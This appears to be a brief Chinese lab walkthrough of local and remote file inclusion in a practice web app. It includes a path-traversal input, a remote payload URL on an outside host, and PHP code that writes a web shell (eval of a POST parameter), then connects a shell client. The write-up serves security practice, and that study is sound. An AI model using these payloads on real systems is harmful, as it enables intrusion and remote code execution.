1.File inclusion(local)（本地文件包含）

步骤一：选择一个球员提交

步骤二：filename后面输入../../../../shw.php访问php文件

2.File Inclusion(remote)（远程文件包含）

步骤一：修改配置

远程包含漏洞的前提：需要php.ini配置如下：

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

步骤二：选择一个球员提交

步骤三：宝塔公网上创建一个6.txt文件，里面输入<?php fputs(fopen("shw.php","w"),'<?php eval($_POST["cmd"]);?>')?>

步骤四：filename后面输入http://47.113.231.0/6.txt

步骤五：fileinclude目录下找到php文件

步骤六：访问php文件，蚁剑连接